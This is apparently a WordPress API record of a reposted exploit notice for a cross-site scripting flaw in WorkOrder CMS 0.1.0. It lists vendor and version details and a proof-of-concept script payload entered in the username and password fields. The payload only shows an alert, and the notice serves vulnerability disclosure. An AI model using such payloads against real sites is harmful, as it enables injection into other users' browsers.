{"id":31019,"date":"2022-09-22T20:01:46","date_gmt":"2022-09-22T17:01:46","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168465\/workordercms010-xss.txt"},"modified":"2022-09-28T15:40:04","modified_gmt":"2022-09-28T12:10:04","slug":"workorder-cms-0-1-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/workorder-cms-0-1-0-cross-site-scripting\/","title":{"rendered":"WorkOrder CMS 0.1.0 Cross Site Scripting"},"content":{"rendered":"<pre dir=\"ltr\"><code># Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS)<\/code><\/pre>\n<p dir=\"ltr\"># Date: Sep 22, 2022<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Exploit Author: Chokri Hammedi<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Vendor Homepage: https:\/\/github.com\/romzes13\/WorkOrderCMS<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Software Link:<br \/>\nhttps:\/\/github.com\/romzes13\/WorkOrderCMS\/archive\/refs\/tags\/v0.1.0.zip<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Version: 0.1.0<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Tested on: Linux<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\"># Payload:<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\">username:&lt;u&gt;test1337&lt;script&gt;alert(&#8216;hi&#8217;);&lt;\/script&gt;<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\">password:&lt;u&gt;test1337&lt;script&gt;alert(&#8216;hi&#8217;);&lt;\/script&gt;<\/p>\n<pre dir=\"ltr\"><code><\/code><\/pre>\n<p dir=\"ltr\">\n<pre dir=\"ltr\"><code><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WorkOrder CMS 0.1.0 Cross-Site Scripting (XSS) # Date: Sep 22, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https:\/\/github.com\/romzes13\/WorkOrderCMS # Software Link: https:\/\/github.com\/romzes13\/WorkOrderCMS\/archive\/refs\/tags\/v0.1.0.zip # Version: 0.1.0 # Tested on: Linux # Payload: username:&lt;u&gt;test1337&lt;script&gt;alert(&#8216;hi&#8217;);&lt;\/script&gt; password:&lt;u&gt;test1337&lt;script&gt;alert(&#8216;hi&#8217;);&lt;\/script&gt;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-31019","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31019","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=31019"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31019\/revisions"}],"predecessor-version":[{"id":31313,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/31019\/revisions\/31313"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=31019"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=31019"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=31019"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}